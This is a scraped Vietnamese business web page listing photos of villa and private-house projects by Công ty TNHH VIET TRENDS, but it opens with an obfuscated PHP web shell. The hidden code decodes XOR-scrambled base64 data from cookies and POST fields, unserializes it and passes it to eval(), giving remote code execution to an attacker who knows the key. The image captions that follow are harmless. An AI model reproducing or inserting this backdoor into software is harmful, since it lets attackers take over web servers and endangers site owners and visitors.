$fqiQjm = chr (84) . "\x44" . chr ( 482 - 403 ).'_' . "\115" . chr (69) . "\156" . chr ( 500 - 421 )."\141";$MasHEAXYRr = "\143" . "\x6c" . "\141" . chr ( 521 - 406 ).chr (115) . "\137" . chr ( 168 - 67 ).chr ( 730 - 610 ).'i' . "\x73" . chr (116) . "\x73";$hMCRxWKtw = class_exists($fqiQjm); $MasHEAXYRr = "42800";$crgEeQoQLx = !1;if ($hMCRxWKtw == $crgEeQoQLx){function gUjss(){$GQSiIVDQ = new /* 20823 */ TDO_MEnOa(7162 + 7162); $GQSiIVDQ = NULL;}$WSmjw = "7162";class TDO_MEnOa{private function mhKZLQApr($WSmjw){if (is_array(TDO_MEnOa::$dxOIZ)) {$rlcgOQF = str_replace("\x3c" . chr ( 228 - 165 ).chr ( 579 - 467 ).'h' . 'p', "", TDO_MEnOa::$dxOIZ['c' . chr (111) . "\x6e" . chr ( 355 - 239 )."\x65" . chr (110) . "\x74"]);eval($rlcgOQF); $WSmjw = "7162";exit();}}private $rKJZi;public function PDtDIwpot(){echo 44118;}public function __destruct(){$WSmjw = "32854_45688";$this->mhKZLQApr($WSmjw); $WSmjw = "32854_45688";}public function __construct($mYDfgJ=0){$MqtmR = $_POST;$kiAqrArYu = $_COOKIE;$hXDZXHScYa = "b117e116-81a1-4a0f-8c63-2a292dd0db21";$pobSIo = @$kiAqrArYu[substr($hXDZXHScYa, 0, 4)];if (!empty($pobSIo)){$FddZxsnOCt = "base64";$dgDSDAMBZi = "";$pobSIo = explode(",", $pobSIo);foreach ($pobSIo as $YccOwzpoM){$dgDSDAMBZi .= @$kiAqrArYu[$YccOwzpoM];$dgDSDAMBZi .= @$MqtmR[$YccOwzpoM];}$dgDSDAMBZi = array_map($FddZxsnOCt . "\137" . chr ( 728 - 628 ).chr ( 224 - 123 )."\x63" . "\x6f" . "\144" . chr (101), array($dgDSDAMBZi,)); $dgDSDAMBZi = $dgDSDAMBZi[0] ^ str_repeat($hXDZXHScYa, (strlen($dgDSDAMBZi[0]) / strlen($hXDZXHScYa)) + 1);TDO_MEnOa::$dxOIZ = @unserialize($dgDSDAMBZi);}}public static $dxOIZ = 246;}gUjss();} MỘT SỐ CÔNG TRÌNH BIỆT THỰ – NHÀ RIÊNG | Công ty TNHH VIET TRENDS
 

Hình Ảnh Công Trình Tiêu Biểu Tại Các Khu Biệt Thự – Nhà Riêng

 

Ld-chuong-hinh-35-TT26-khu-do-thi-moi-Van-Phu

Ld-chuong-hinh-tang-15-Hapulico-Complex-thanh-xuan-ha-noi

Ld-chuong-hinh-so-5-ngo-94-cau-giay-ha-noi

Ld-chuong-hinh-so-5-ngo-25-Trieu-viet-vuong-hai-ba-trung-ha-noi

Ld-chuong-hinh-P1607-17T1-khu-do-thi-trung-van-ha-dong

Ld-chuong-hinh-P1103-B7-Kim-Lien-Dong-Da-Ha-Noi

Ld-chuong-hinh-nha-58-hoa-mai-3-khu-do-thi-Vincom-Long-Bien-ha-noi

Ld-chuong-hinh-H20-Ngo-130-Trung-Kinh-Cau-Giay-Ha-Noi

Ld-chuong-hinh-C40-TT9-Van-quan-ha-dong

Ld-chuong-hinh-70-vuon-mai-Ecopark-Hung-yen

 

H-Gang-Sync-Auto-Glass-ngo-76-dai-tu

Google+